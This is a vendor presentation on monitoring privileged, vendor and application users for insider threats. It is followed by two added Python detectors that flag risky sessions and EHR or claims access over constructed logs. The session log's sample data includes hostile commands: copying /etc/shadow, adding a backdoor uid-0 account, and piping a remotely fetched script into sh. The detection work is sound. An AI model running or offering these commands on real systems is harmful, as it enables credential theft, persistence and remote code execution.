USER BEHAVIOR MONITORING: KNOW WHEN USERS PUT YOUR BUSINESS AT RISK
Presented by Matt Zanderigo

WHO IS OBSERVEIT?
The leading provider of User Behavior Monitoring for application users, admins and external vendors
  HQ Boston, MA / R&D Tel Aviv, Israel
  Founded 2006
  1,200+ customers worldwide
  $20M invested by Bain Capital

APPLICATION ACCESS
  App Users
  App Admins
PRIVILEGED ACCESS
  Shared Accounts (Windows Admins, root, DBAs, System Admins,…)
  Named Accounts (Developers, IT Contractors, Network Admin,…)

APPLICATION ACCESS: THE WINDOW TO OUR MOST SENSITIVE DATA
  AT&T will pay $25 million after call center workers sold customer data
  Ex-JPMorgan employee charged with stealing customer data
  Morgan Stanley insider exposes rich clients' info online

APP BLIND SPOTS = DATA EXPOSURE
SHIFT FOCUS FROM POSSIBLE ACTIONS TO ACTUAL USAGE
  App entitlement changes: adding users, deleting accounts, modifying access
  Logging app utilization: customer data, financial records, account information

Get deep insight within applications (customer example)
  Challenge: Get visibility within 20 financial apps. The customer needed to comply with FDIC requirements for the audit and logging of privileged access to applications. This had been an ongoing challenge for over two years, because some of the legacy and web-based applications have no internal logging or audit reports that meet FDIC regulations.
  Solution: A holistic view of application utilization by administrator-level users; real-time alerts for the creation, modification or deletion of users; reports centered on application access as a whole.

PRIVILEGED ACCESS: THE ROOT OF TODAY'S BIGGEST BREACHES
  56M affected by Home Depot breach, privilege escalation to blame
  78.8M affected by Anthem breach, DBA account compromised
  Sony attackers used stolen admin credentials

SUPER USER OR SUPER THREAT?
SHIFT FOCUS FROM SESSION RECORDING TO USER ANALYTICS
  Configuration changes: embedded scripts, insecure 'shell', unauthorized access, unapproved 'setuid', escalated privileges
  Lateral movement: 'rm' or 'cp' with 'sudo', creating "backdoors", 'leapfrog' logins

Get deep insight within sessions (customer example): visibility within sessions on 160 PCI/SOX systems
  Challenge: The Board of Directors of Ally Bank established a Privileged User Access (PUA) project covering all sessions that access data on servers in scope for PCI and SOX compliance. Their 5,000 privileged users represented a significant risk to the organization, so they were rolling out password vaulting (Lieberman) and needed to implement a monitoring program in parallel.
  Solution: A monitoring system that collects, alerts and reports on the specific use of applications and functions, and on access to specific information.

WHAT YOU NEED TO MONITOR
  Who: privileged users, application users, external vendors
  What: healthcare (PHI) data, customer (PII) data, employee data, company data, financial data, intellectual property, sales & marketing data
  Audit and compliance: EU Data Protection Reform, SOX, HIPAA

PRIVILEGED USER MONITORING
Privileged Identity Management:
  Provisioning & Governance
  User Monitoring: visual audit trail of all privileged user sessions; app and access usage reporting; detailed session analysis (sudo, privilege escalation, backdoors, …)
  Password Vaults

CUSTOMER EXAMPLES
  PCI vendor privileged access: monitoring internal and credit card vendors with access to PCI systems; detecting unauthorized configuration changes; meeting internal and external audit requirements
  Privileged user monitoring for HIPAA: monitoring privileged users with access to over 1,350 servers to protect PHI; auditing 1,700 business users who access applications including PeopleSoft, Microsoft Lync and home-grown tools; real-time monitoring of unauthorized account creation and firewall changes

3RD PARTY VENDOR MONITORING
3rd Party Vendor Compliance:
  Controlled Access
  User Monitoring: identify and monitor third-party access; remote-access user activity monitoring; alert on unauthorized access to sensitive systems; incident response including session replay from log events; HIPAA, PCI, NERC, FFIEC, SOX, FISMA, FERPA
  Change Management

CUSTOMER EXAMPLES
  Remove vendor access to ERP: audit the third-party ERP solution provider; monitor internal IT administrators' activities; deter negligent third-party activity
  Monitoring private cloud contractors: a global project to consolidate 140 data centers into 6 and provide a private cloud to all Allianz subsidiaries; needed to meet strict German data protection laws to keep the project on track; monitors over 300 IBM contractors; expanding coverage to all contractors and privileged users

APPLICATION USER MONITORING
Insider Threats:
  Critical Applications
  At-Risk Employees: remote workers, employee turnover, layoffs, two weeks' notice, HR watch list
  Shadow IT

CUSTOMER EXAMPLES
  EHR system (Epic) & PHI servers: alert if an employee views the patient record of another hospital employee; if a doctor, nurse, pharmacist, etc. views the record of a patient not under their care; if a doctor, nurse, pharmacist, etc. views the record of a high-profile patient (VIP); monitor privileged users with access to the PHI data storage infrastructure
  Policy quoting & claims handling: app data extraction (exporting reports, large copy operations); unnecessary access to sensitive files (view/open/save/export); business claims employees viewing personal claims information

THANK YOU
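The "Shift focus from session recording to user analytics" slide lists the session behaviours worth alerting on (rm/cp under sudo, unapproved setuid, escalated privileges, embedded scripts, backdoor accounts, leapfrog logins) but not how a monitor would recognise them. The following is an added example, not ObserveIT code or a description of its product: it runs those rules over a constructed session-command log in a hypothetical key=value recording format, treats a small assumed set of hosts as the in-scope PCI/SOX servers, and also flags a session as a leapfrog hop when its source address is itself one of the monitored servers.

```python
"""Privileged-session analytics over a constructed command log (added example)."""
import re
import shlex
from collections import Counter

# Constructed sample in a hypothetical key=value session-recording format; not real data.
SAMPLE_LOG = """\
2015-03-02T10:01:05 host=db01 user=jsmith src=10.0.9.20 cmd="sudo cp /etc/shadow /tmp/.s"
2015-03-02T10:01:40 host=db01 user=jsmith src=10.0.9.20 cmd="chmod u+s /tmp/bk"
2015-03-02T10:02:11 host=db01 user=jsmith src=10.0.9.20 cmd="ssh ops@app02"
2015-03-02T10:02:15 host=app02 user=ops src=db01 cmd="sudo useradd -o -u 0 -g 0 svc_backup"
2015-03-02T10:03:00 host=app02 user=ops src=db01 cmd="sudo -i"
2015-03-02T10:04:30 host=app02 user=ops src=db01 cmd="curl -s http://203.0.113.9/x.sh | sh"
2015-03-02T11:15:00 host=web01 user=mlee src=10.0.9.31 cmd="sudo systemctl restart nginx"
"""

MONITORED_SERVERS = {"db01", "app02", "web01"}        # assumed in-scope PCI/SOX hosts
SHELLS = {"sh", "bash", "zsh", "ksh", "python", "perl"}
LINE_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) src=(?P<src>\S+) cmd="(?P<cmd>.*)"$')
# symbolic "u+s" / "ug+rws" or octal modes with the setuid bit (4xxx..7xxx)
SETUID_MODE = re.compile(r"^([ugoa]*\+[rwxXt]*s|[4-7][0-7]{3})$")


def parse(log):
    """One dict per well-formed log line; malformed lines are skipped."""
    return [m.groupdict() for m in map(LINE_RE.match, log.splitlines()) if m]


def classify(ev):
    """Labels for one recorded command, mirroring the slide's categories."""
    try:
        argv = shlex.split(ev["cmd"])
    except ValueError:                       # unbalanced quotes: fall back to whitespace split
        argv = ev["cmd"].split()
    if not argv:
        return []
    found = []
    via_sudo = argv[0] == "sudo"
    rest = argv[1:] if via_sudo else argv
    eff = next((a for a in rest if not a.startswith("-")), None)   # effective program
    # escalated privileges / insecure shell: sudo -i, sudo -s, sudo su, sudo bash, su
    if (via_sudo and (({"-i", "-s"} & set(rest)) or eff in SHELLS | {"su"})) or argv[0] == "su":
        found.append("escalated privileges (interactive root shell)")
    if via_sudo and eff in {"rm", "cp"}:
        found.append("'%s' with 'sudo'" % eff)
    if eff == "chmod" and any(SETUID_MODE.match(a) for a in rest):
        found.append("unapproved 'setuid'")
    # backdoors: a second uid-0 account, or a key appended to authorized_keys
    if eff in {"useradd", "usermod"} and any(
            a == "-u" and rest[i + 1] == "0" for i, a in enumerate(rest[:-1])):
        found.append("backdoor (new uid-0 account)")
    if any("authorized_keys" in a for a in argv) and ">>" in argv:
        found.append("backdoor (key appended to authorized_keys)")
    # embedded scripts: something piped into an interpreter, or an inline -c body
    if ("|" in argv and argv[-1] in SHELLS) or (eff in SHELLS and "-c" in rest):
        found.append("embedded script")
    # lateral movement: ssh/scp launched from inside a monitored server
    if eff in {"ssh", "scp", "sftp"} and ev["host"] in MONITORED_SERVERS:
        found.append("'leapfrog' login (%s from monitored server %s)" % (eff, ev["host"]))
    return found


def analyze(log):
    """Return (findings, per-user counts); findings are (ts, host, user, label)."""
    findings, flagged_sessions = [], set()
    for ev in parse(log):
        session = (ev["host"], ev["user"], ev["src"])
        # a session whose source is itself a monitored server arrived by leapfrogging
        if ev["src"] in MONITORED_SERVERS and session not in flagged_sessions:
            flagged_sessions.add(session)
            findings.append((ev["ts"], ev["host"], ev["user"],
                             "'leapfrog' login (session arrived from %s)" % ev["src"]))
        for label in classify(ev):
            findings.append((ev["ts"], ev["host"], ev["user"], label))
    return findings, Counter(f[2] for f in findings)


if __name__ == "__main__":
    findings, per_user = analyze(SAMPLE_LOG)
    for ts, host, user, label in findings:
        print(ts, host, user, label)
    print("findings per user:", dict(per_user))
```

Per-user counts are the simplest form of the "user analytics" the slide contrasts with raw session replay: in the sample, jsmith and ops accumulate findings across two hosts while the routine service restart by mlee produces none, which is the signal a reviewer would want surfaced before opening any recording.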
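The two application-user customer examples (the EHR/PHI rules and the claims-handling rules) describe access-policy checks that depend on context the application log alone does not carry: who is on a patient's care team, which patients are also staff, which records are VIP, and which claims line a user belongs to. The following is an added example, not ObserveIT's product or the customer's configuration: it joins a constructed access log against constructed reference data (hypothetical patient and claim identifiers, an assumed 500-row threshold for "bulk" exports) and emits one finding per rule hit. It exempts a patient's own care team from the employee-record rule, which is an assumption the slide does not state.

```python
"""Application-access analytics over a constructed EHR / claims access log (added example)."""
import re
from collections import Counter

CLINICAL_ROLES = {"physician", "nurse", "pharmacist"}
EXPORT_ROW_THRESHOLD = 500                   # assumed: exports at or above this are "bulk"

# Constructed reference data with hypothetical identifiers; not real patients or claims.
RECORDS = {
    "P100": {"kind": "patient", "care_team": {"dr_ahmed", "rn_park"}, "vip": False, "staff_user": None},
    "P200": {"kind": "patient", "care_team": {"dr_ahmed"}, "vip": True, "staff_user": None},
    "P300": {"kind": "patient", "care_team": {"rn_park"}, "vip": False, "staff_user": "j_doe"},
    "C500": {"kind": "claim", "line": "personal"},
    "C600": {"kind": "claim", "line": "business"},
}

# Constructed access log in a hypothetical key=value format.
SAMPLE_LOG = """\
2015-04-01T09:00:00 user=dr_ahmed role=physician app=EHR action=view id=P100
2015-04-01T09:05:00 user=rn_park role=nurse app=EHR action=view id=P200
2015-04-01T09:10:00 user=dr_ahmed role=physician app=EHR action=view id=P200
2015-04-01T09:20:00 user=b_ross role=billing app=EHR action=view id=P300
2015-04-01T09:25:00 user=rn_park role=nurse app=EHR action=view id=P300
2015-04-01T10:00:00 user=k_lin role=business_claims app=Claims action=view id=C500
2015-04-01T10:05:00 user=k_lin role=business_claims app=Claims action=export id=REPORT_Q1 rows=12000
2015-04-01T10:30:00 user=m_chu role=personal_claims app=Claims action=view id=C500
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse(log):
    """One dict per line: the leading timestamp plus the key=value fields."""
    events = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, _, rest = line.partition(" ")
        ev = dict(FIELD_RE.findall(rest))
        ev["ts"] = ts
        events.append(ev)
    return events


def classify(ev):
    """Labels for one access event under the slide's rules."""
    found = []
    user, role, action = ev["user"], ev["role"], ev["action"]
    # data extraction: large exports are flagged whatever the record is
    if action == "export" and int(ev.get("rows", 0)) >= EXPORT_ROW_THRESHOLD:
        found.append("bulk data extraction (%s rows)" % ev["rows"])
    rec = RECORDS.get(ev.get("id"))
    if rec is None or action != "view":
        return found
    if rec["kind"] == "patient":
        on_care_team = user in rec["care_team"]
        # employee viewing another employee's record (care team assumed exempt)
        if rec["staff_user"] and user != rec["staff_user"] and not on_care_team:
            found.append("employee viewed another employee's patient record")
        if role in CLINICAL_ROLES and not on_care_team:
            found.append("clinician viewed patient not under their care")
        if rec["vip"]:
            found.append("VIP patient record viewed")
    elif rec["kind"] == "claim":
        if rec["line"] == "personal" and role == "business_claims":
            found.append("business claims user viewed personal claim")
    return found


def analyze(log):
    """Return (findings, per-user counts); findings are (ts, user, label)."""
    findings = [(ev["ts"], ev["user"], label)
                for ev in parse(log) for label in classify(ev)]
    return findings, Counter(f[1] for f in findings)


if __name__ == "__main__":
    findings, per_user = analyze(SAMPLE_LOG)
    for ts, user, label in findings:
        print(ts, user, label)
    print("findings per user:", dict(per_user))
```

The care-team and staff-record lookups are the part that makes such alerts usable: without them every chart open by a clinician looks the same, and the VIP rule fires on legitimate treating physicians as well (as it does for dr_ahmed in the sample), which is usually intended so that the access is reviewed rather than suppressed.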